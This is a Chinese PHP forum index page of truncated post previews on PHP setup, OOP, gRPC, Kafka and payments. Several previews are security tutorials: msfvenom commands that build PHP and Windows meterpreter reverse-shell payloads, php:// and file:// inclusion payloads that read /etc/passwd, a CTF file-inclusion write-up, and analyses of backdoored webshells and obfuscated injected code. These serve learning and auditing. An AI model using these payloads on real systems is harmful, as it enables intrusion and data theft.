PHP论坛 今日: 0|主題: 591|排名: 88 

            php 相关 　　wget https://www.php.net/distributions/php-7.2.16.tar.gz //你可以官网获取最新的包        tar解压    //一般目录 /usr/src 　   yum  -y  install  gcc  gcc-c++  libxml2-devel m4 ...

前两天发现的宝藏网站：https://php.mengsec.com/ 在github上面找到了源代码：https://github.com/Xyntax/1000php，可以在自己的服务器上面搭建 跟数据结构学习一样，每天跟着上面前辈们的案例进行审计，打基础+学习思路   1，BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞 使用seay自动审计工具    可以看到第 ...

简述 PHP + JQuery实现 前台：将图片进行base64编码，使用ajax实现上传 后台：将base64进行解码，存储至文件夹，将文件名称入库 效果图 功能实现 html <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>showImages</title> <style type="text/css"> .float{ float:left; ...

1. 什么事面向对象？主要特征是什么？ 面向对象是程序的一种设计方式，它利于提高程序的重用性，使程序结构更加清晰。主要特征：封装、继承、多态。 更多学习内容请访问： 怎么从一名码农成为架构师的必看知识点：目录大全（不定期更新） ★官方PHP高级学习交流社群「点击」管理整理了一些资料，BAT等一线大厂进阶知识 ...

目录一、gRPC是什么？RPC框架是什么？gRPC的特性gRPC使用流程二、Protocol Buffers是什么？三、需求：开发健身房服务四、最佳实践Golang1. 安装protoc2. 安装protoc-gen-go3. 安装grpc包4. 生成代码5. 定义服务端6. 定义客户端7. 运行代码Python1. 安装grpc包2. 安装protobuf3. 安装grpc的protobuf编译工具4. 生成代码5. 定 ...

本次想要配置webhook钩子，   做钩子大多是走 ssh 协议, coding 里配置部署公钥   之前用 docker 写钩子, 也是 ssh 权限的问题   包工具： 1.composer require cpliakas/git-wrapper 2.composer : deploy   查看当前是哪个用户在运行 PHP 两种办法： 1、PHP 代码   （1） <pre> <?php echo sh ...

近些年微服务架构大行其道，趁着最近有时间，来捣鼓捣鼓微服务是怎么一回事。 微服务架构 微服务的概念由 Martin Fowler 于2014年3月提出： 微服务架构是一种架构模式，它提倡将单一应用程序划分成一组小的服务，服务之间相互协调、互相配合，为用户提供最终价值。每个服务运行在其独立的进程中，服务和服务之间采用轻量级 ...

简介 PHP在使用双等号(==)判断的时候，不会严格检验传入的变量类型,同时在执行过程中可以将变量自由地进行转换类型。由于弱数据类型的特点，在使用双等号和一些函数时，会造成一定的安全隐患 eg: <?php var_dump("admin"==0); //true var_dump("1admin"==1); //true var_dump("admin1"==1); //false var_ ...

一   建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php     注：生成的反弹木马存放在当前用户home目录下； 将生成的木马上传到目标机中，可以远程访问； windows下asp反弹木马： root@kali:~# msfvenom -p windows/meterpreter/rev ...

针对PHP的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injection) 6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 7、Session 会话劫持(Session ...

思考：子列可以从父类进行继承，那如果子类与父类的成员重名了怎么办？ 引入：首先，类中定义的成员是允许出现与其他类同名的，但是这个过程如果出现了继承，那么重名就存在重写的问题。   重写override【掌握】 定义：重写，即子类中定义了与父类重名的成员，子类可以重写父类任意类成员，通常重写是用来重写父类的方 ...

file:// 作用： 用于访问文件（绝对路径、相对路径、网络路径） 示例： http://www.xx.com?file=file:///etc/passswd php:// 作用： 访问输入输出流 1. php://filter 作用： 读取源代码并进行base64编码输出 示例： http://127.0.0.1/cmd.php?cmd=php://filter/read=convert.base64-encode/resource=[文件名]（针 ...

php伪协议是ctf中的一个考点，目前比较熟悉的伪协议有php://filter, php://input, data://text/plain, file://，后续补充。 要成功应用伪协议需要php.ini文件的allow_url_fopen      默认开启 　　　　　　　　　　　　　　　　allow_url_include    默认关闭 file://伪协议 此协议可以 ...

发现一个框架漏洞，可以大量getshell，在网上下载的webshell发现有后门，最后在github上有很多web但是又没说明密码    https://github.com/tennc/webshell/blob/master/php/5678.php 就准备开始解析这段代码 1 <?php 2 $info='7P3ZcuPMsiUIv0pb2b/N6r9pwyDqfLK2ukgkAVJQAhSGCBC4IwFaQsQgpkSJFNvq3duXB0CC1J ...

前言  最近的日子简简单单 早上起来健身+散打来一套 看看电视剧学习学习吃吃饭一天就结束了emmmm太快了一天 所以要更加努力！更加勤奋！ PHP代码执行漏洞 有的应用程序中提供了一些可以将字符串作为代码执行的函数，例如PHP中的eval函数，可以将改函数的参数当做PHP代码来执行。如果对这些函数的参数控制不严格，就可 ...

攻防世界-Web_php_include   （考察的是文件包含） 打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(区分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET[ ...

ipay88支付 近期接了一个国外的项目，客户指定要这种支付，就搞搞呗，其实流程和思路都是差不多的，往下看 他的流程其实非常简单  下面的流程仔细看看，看懂了就会了 　　　　　　　　　　 1 首先我们需要先获取下单所需要的参数（这个需要去ipay88官网去申请）， 　　　　　　　　　　　　就是下面main.php里面的一些 ...

概述 现在爬虫技术算是一个普遍的技术了，各个语言的爬虫百家争鸣，但是根据笔者自己的感觉还是python是主流。爬虫涉及到太多的东西，笔者并不是专业的爬虫工程师，只不过个人兴趣分享一下。由于笔者是php工作，所以就使用php来进行简单爬虫。不过我的方法应该是很通用的，我相信java，C#等肯定有类似的函数，然后做法其实 ...

发现很多网上的源码，都会被插入一段来历不明的代码。   此类代码加密特征为： $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');、eval(($$O0O0000O0(    例如： <?php /* */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34% ...

php没有官方的kafka扩展，所以我们需要找到社区版的插件用。 目前有一个比较火的kafka扩展，这个扩展是用C写的，直接通过pecl安装。地址：https://arnaud.le-blanc.net/php-rdkafka-doc/phpdoc/book.rdkafka.html  安装这个插件有个前提条件，必须先安装 librdkafka git clone https://github.com/edenhill/libr ...